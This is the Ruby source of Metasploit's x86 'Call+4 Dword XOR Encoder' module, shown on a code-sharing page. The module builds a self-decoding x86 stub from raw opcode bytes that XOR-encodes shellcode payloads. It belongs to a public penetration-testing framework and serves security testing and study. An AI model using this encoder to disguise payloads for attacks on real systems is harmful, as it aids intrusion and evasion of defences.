Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/encoders/x86/call4_dword_xor.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Encoder::Xor
7
8
def initialize
9
super(
10
'Name' => 'Call+4 Dword XOR Encoder',
11
'Description' => 'Call+4 Dword XOR Encoder',
12
'Author' => [ 'hdm', 'spoonm' ],
13
'Arch' => ARCH_X86,
14
'License' => MSF_LICENSE,
15
'Decoder' => {
16
'KeySize' => 4,
17
'BlockSize' => 4
18
})
19
end
20
21
#
22
# Returns the decoder stub that is adjusted for the size of
23
# the buffer being encoded
24
#
25
def decoder_stub(state)
26
# Sanity check that saved_registers doesn't overlap with modified_registers
27
if !(modified_registers & saved_registers).empty?
28
raise BadGenerateError
29
end
30
31
decoder =
32
Rex::Arch::X86.sub(-(((state.buf.length - 1) / 4) + 1), Rex::Arch::X86::ECX,
33
state.badchars) +
34
"\xe8\xff\xff\xff" + # call $+4
35
"\xff\xc0" + # inc eax
36
"\x5e" + # pop esi
37
"\x81\x76\x0eXORK" + # xor [esi + 0xe], xork
38
"\x83\xee\xfc" + # sub esi, -4
39
"\xe2\xf4" # loop xor
40
41
# Calculate the offset to the XOR key
42
state.decoder_key_offset = decoder.index('XORK')
43
44
return decoder
45
end
46
47
# Indicate that this module can preserve some registers
48
def can_preserve_registers?
49
true
50
end
51
52
# A list of registers always touched by this encoder
53
def modified_registers
54
[ Rex::Arch::X86::ECX, Rex::Arch::X86::EAX, Rex::Arch::X86::ESI ]
55
end
56
57
# Convert the SaveRegisters to an array of x86 register constants
58
def saved_registers
59
Rex::Arch::X86.register_names_to_ids(datastore['SaveRegisters'])
60
end
61
end
62
63